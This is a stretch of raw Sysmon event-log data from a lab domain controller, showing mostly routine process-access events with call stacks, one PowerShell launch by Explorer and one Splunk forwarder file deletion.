10341000x80000000000000009866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.985{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.985{266CAFBE-64C5-6064-A500-00000000AE01}43563144C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+d6d17|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+167aaf 154100x80000000000000009862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.980{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 
10341000x80000000000000009861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.923{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.923{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000009858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000009857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.907{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.907{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.454{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.454{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.454{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000009850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.439{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6592EE3DB6471E4F4F8E787005BBEBDE,SHA256=F8CB8A4EDDC8AD7C3319A64AEBCBD3746C19167B0088EA500443EF746EDA0712,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.126{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AA-6064-4E01-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.126{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:03.126{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-65AA-6064-4E01-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.126{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AA-6064-4E01-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
